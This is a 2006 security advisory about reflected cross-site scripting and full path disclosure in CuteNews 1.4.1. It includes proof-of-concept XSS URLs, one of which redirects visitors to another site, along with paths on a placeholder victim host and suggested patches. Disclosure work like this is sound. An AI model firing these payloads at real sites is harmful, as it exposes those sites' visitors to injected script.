Exploit: CuteNews 1.4.1 Multiple vulnerabilities ( Ascii Version )

Search:
WLB2

CuteNews 1.4.1 Multiple vulnerabilities

Published
Credit
Risk
2006.05.10
k4p0k4p0 hotmail com
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-2250
CVE-2006-2249
No
Yes

Plain text version

/*

---------------------------------------------------------------

[N]eo [S]ecurity [T]eam [NST]® Advisory #20

---------------------------------------------------------------

Program : CuteNews 1.4.1

Homepage: http://www.cutephp.com

Vulnerable Versions: CuteNews 1.4.1 & lower ones

Risk: Medium!

Impact: Cross Site Scripting, Full Path Disclosure

-> CuteNews 1.4.1 Multiple vulnerabilities <-

---------------------------------------------------------------

- Description

---------------------------------------------------------------

Cute news is a powerful and easy for using news management system

that use flat files to store its database. It supports comments and

archives that can be organized by months.

- Tested

---------------------------------------------------------------

Tested in localhost & many remote CuteNews

- Bug

---------------------------------------------------------------

1 - [ Cross Site Scripting ]

There're serveral XSS bugs in 'search.php' file, this is caused because

the script doesn't filter right three _GET variables that're used in

some fields of the web page.

To be short, here is the vulnerable code:

<div align="center">

<table border="0" cellspacing="0" cellpadding="0">

<tr>

<td><table width="100%" cellspacing="0" cellpadding="0">

<td width="100%">

<p align="right">News <input type=text value="$story"

name=story size="24">

</table></td>

</tr>

<tr>

<td>

<div id='advanced' style='display:none;z-index:1;'>

<table width="100%" cellspacing="0" cellpadding="0">

<td width="100%" align="right">

<p align="right">Title <input type=text value="$title"

name=title size="24">

<tr>

<td width="100%" align="right">Author <input type=text value="$user"

name=user size="24">

</tr>

Those variables where `extracted' (extract()) from the global variables,

but the problem itself is that they're not filtered. So here we can see

that the following variables allow html injection arbitrary code: $user,

$story, $title.

2 - [ Full Path Disclosure ]

In /inc/ folder, there're 2 .php files that don't check if they're been

called directly.

- Proof of concept

---------------------------------------------------------------

1 - [ Cross site scripting ]

As PoC, here you've some intresting results:

- search.php?dosearch=yes&story=%22%3E%3Cscript%3Ealert

%28%22NST+PoC+by+K4P0%22%29%3B%3C%2Fscript%3E&title=&

user=&from_date_day=&from_date_month=&from_date_year=&

to_date_day=&to_date_month=&to_date_year=

- search.php?dosearch=yes&title=%22%3E%3Cscript%3Ealert

(%22NST%20PoC%20by%20K4P0%22 );%3C/script%3E&user=

&from_date_day=&from_date_month=&from_date_year=

&to_date_day =&to_date_month=&to_date_year=

- search.php?dosearch=yes&story=K4P0&user=%22%3E%3Cscript%3

Ealert(%22NST%20PoC%20by%20K4P0%22);%3C/script%3E&from_date_day=

&from_date_month=&from_date_year=&to_date_day=&to_date_month=

&to_date_year=

- search.php?dosearch=yes&title="><script>window.location=

'http://www.neosecurityteam.net/';</script>&user=&from_date_day=

&from_date_month=&from_date_year=&to_date_day=&to_date_month=

&to_date_year=

Note: magic_quotes_gpc must be off

2 - [ Full path disclosure ]

www.victim.com/cutenews/inc/show.inc.php

www.victim.com/cutenews/inc/functions.inc.php

- Solutions

---------------------------------------------------------------

It's highly recommended to uptdate your CuteNews, but if you want to

patch it yourself take a look at the following recommendations:

1 - [ Cross site scripting ]

Set magic_quotes_gpc ON in your php.ini, but as this cannot be possible

in serveral servers (hosting stuff), the real solution is to filter

these variables.

Go to line 25 and change it to this:

// Show Search Form

$user = htmlentities($user);

$story = htmlentities($story);

$title = htmlentities($title);

echo<<<HTML

<script language='javascript' type="text/javascript">

function mySelect(form){

form.select();

}

function ShowOrHide(d1, d2) {

if (d1 != '') DoDiv(d1);

if (d2 != '') DoDiv(d2);

}

2 - [ Full Path Disclosure ]

In the first line of 'functions.inc.php' write:

if (eregi('functions.inc.php', $_SERVER['PHP_SELF']))

die('You are not allowed to see this page directly');

In the first line of 'shows.inc.php' write:

if (eregi('shows.inc.php', $_SERVER['PHP_SELF']))

die('You are not allowed to see this page directly');

- Timeline

---------------------------------------------------------------

03/03/2006 - Vendor was notified about security issues

*** - Vendor did not reply but released a newer version.

- Discalimer

---------------------------------------------------------------

YOU are the only RESPONSALBE of any DAMAGE of above techniques

could cause or any code you have made based in this advisory,

all ideas, proof of concepts, solutions, descriptions were made

only for EDUCATIONAL propuses, use all above information at your

own risk.

- References

---------------------------------------------------------------

http://NeoSecurityTeam.net/index.php?action=advisories&id=20

http://NeoSecurityTeam.net/advisories/Advisory-20.txt

- Credits

---------------------------------------------------------------

Discovered by k4p0 -> k4p0k4p0[at]hotmail[dot]com

[N]eo [S]ecurity [T]eam [NST]&reg; - http://NeoSecurityTeam.net/

Irc.FullNnetwork.org #nst

Questions? (Eng | Spa) -> http://NeoSecurityTeam.net/foro/

- Greets

---------------------------------------------------------------

Paisterist

HaCkZaTaN

Link

Daemon21

erg0t

NST Comunity!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@

'@@@@@''@@'@@@''''''''@@''@@@''@@

'@@'@@@@@@''@@@@@@@@@'''''@@@''''

'@@'''@@@@'''''''''@@@''''@@@''''

@@@@''''@@'@@@@@@@@@@''''@@@@@'''

*/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version